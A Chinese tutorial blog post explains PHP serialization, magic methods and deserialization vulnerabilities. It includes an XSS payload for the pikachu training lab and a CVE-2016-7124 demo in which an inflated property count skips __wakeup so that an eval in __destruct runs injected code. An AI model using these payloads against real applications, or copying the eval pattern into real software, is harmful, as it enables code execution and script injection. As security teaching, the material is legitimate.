美文网首页
PHP反序列化漏洞知识整理

PHP反序列化漏洞知识整理

作者: nohands_noob | 来源:发表于2020-10-28 22:22 被阅读0次

    0x00 序列化与反序列化

    序列化:将对象转化为字符串的形式,称为序列化,在php中可以使用serialize函数实现
    反序列化:将字符串还原成对象的形式,称为反序列化,在php中可以使用unserialize函数实现


    一个序列化的例子

    <?php
    class Test{
      public $a = 'ThisA';
      protected $b = 'ThisB';
      private $c = 'ThisC';
      public function test1(){
          echo 'this is test1 ';
      }
    }
    
    $test = new Test();
    
    var_dump(serialize($test));
    
    ?>
    
    运行结果:
    O:4:"Test":3:{s:1:"a";s:5:"ThisA";s:4:"�*�b";s:5:"ThisB";s:7:"�Test�c";s:5:"ThisC";}
    

    O:4:"Test":3的解释:O标识这是一个对象,4表示对象名的长度,“Test”表示对象名,3表示了对象有3个成员

    s:1:"a";s:5:"ThisA";的解释:s表示类型为String,为字符串,1表示成员名长度,“a”是这个成员名;s:5:"ThisA",表示值类型为字符串长度为5,值未“ThisA”。

    protected属性成员 序列化后名字会以 "%00*%00b"表示,即%00*%00成员名

    private属性成员 序列化后会名字会以"%00Test%00c"表示,即%00类名%00成员名

    可以看到,对象的方法并不序列化到字符串中。

    对于不同类型的序列化字符串保存形式
    String : s:size:value;
    Integer : i:value;
    Boolean : b:value;(保存1或0)
    Null : N;
    Array : a:size:{key definition;value definition;(repeated per element)}
    Object : O:strlen(object name):object name:object size:{s:strlen(property name):property name:property definition;(repeated per property)}


    一个反序列化例子:

    <?php
    class Test{
      public $a = 'ThisA';
      protected $b = 'ThisB';
      private $c = 'ThisC';
      public function test1(){
          echo 'this is test1';
      }
    }
    
    $test = new Test();
    
    $str = serialize($test);
    //通过反序列化创建对象并执行函数
    $test1 = unserialize($str);
    $test1->test1();
    ?>
    

    0x01 魔法函数

    __construct()当一个对象创建时被调用
    __destruct()当一个对象销毁时被调用
    __toString()当一个对象被当作一个字符串使用
    __sleep() 在对象在被序列化之前运行
    __wakeup将在序列化之后立即被调用

    代码例子:

    <?php
    class Test{
      function __construct(){
          echo 'construct run<br>';
      }
    
       function __destruct(){
           echo 'destruct run<br>';
       }
    
       function __toString(){
           return 'toString run<br>';
       }
    
       function __sleep(){
           echo 'sleep run<br>';
           return array();
       }
    
       function __wakeup(){
           echo 'wakeup run<br>';
       }
    }
    
    $test = new Test();    // __construct run
    echo $test;       // __toString run
    $str = serialize($test); // __sleep run
    $test1 = unserialize($str); // __wakeup run
    unset($test);            // __destruct run
    ?>
    
    执行结果:

    0x02 反序列化漏洞

    序列化和反序列化本身并没有问题,但结合了魔法函数加上参数可控,就可能造成问题,以pikachu靶场的一个例子:

    class S{
       var $test = "pikachu";
       function __construct(){
           echo $this->test;
       }
    }
    
    //O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
    $html='';
    if(isset($_POST['o'])){
       $s = $_POST['o'];
       if(!@$unser = unserialize($s)){
           $html.="<p>大兄弟,来点劲爆点儿的!</p>";
       }else{
          $html.="<p>{$unser->test}</p>";
       }
    
    }
    

    用户可以传递序列化字符串给服务器进行反序列化,并将对象的test成员输出到页面上,此时的test的值为我们所控

    提交payload触发xss:O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}

    0x03 CVE-2016-7124(绕过__wakeup函数)

    影响版本:PHP5 < 5.6.25
    PHP7 < 7.0.10

    在反序列化时,如果字符串中对象属性个数大于实际属性个数,wakeup将跳过执行。

    <?php
    class Test{
       public $test='123456';
    
       function __wakeup(){
           $this->test = 'echo "wakeup run";';
       }
    
       function __destruct(){
           @eval($this->test);
       }
    }
    
    $str = 'O:4:"Test":1:{s:4:"test";s:10:"phpinfo();";}';
    
    $test1 = unserialize($str);
    ?>
    

    以上代码的执行结果


    当序列化字符串将对象属性个数修改成大于实际数量时,将绕过wakeup的执行,$str = 'O:4:"Test":2:{s:4:"test";s:10:"phpinfo();";}';

    相关文章

      网友评论

          本文标题:PHP反序列化漏洞知识整理

          本文链接:https://www.haomeiwen.com/subject/sobtvktx.html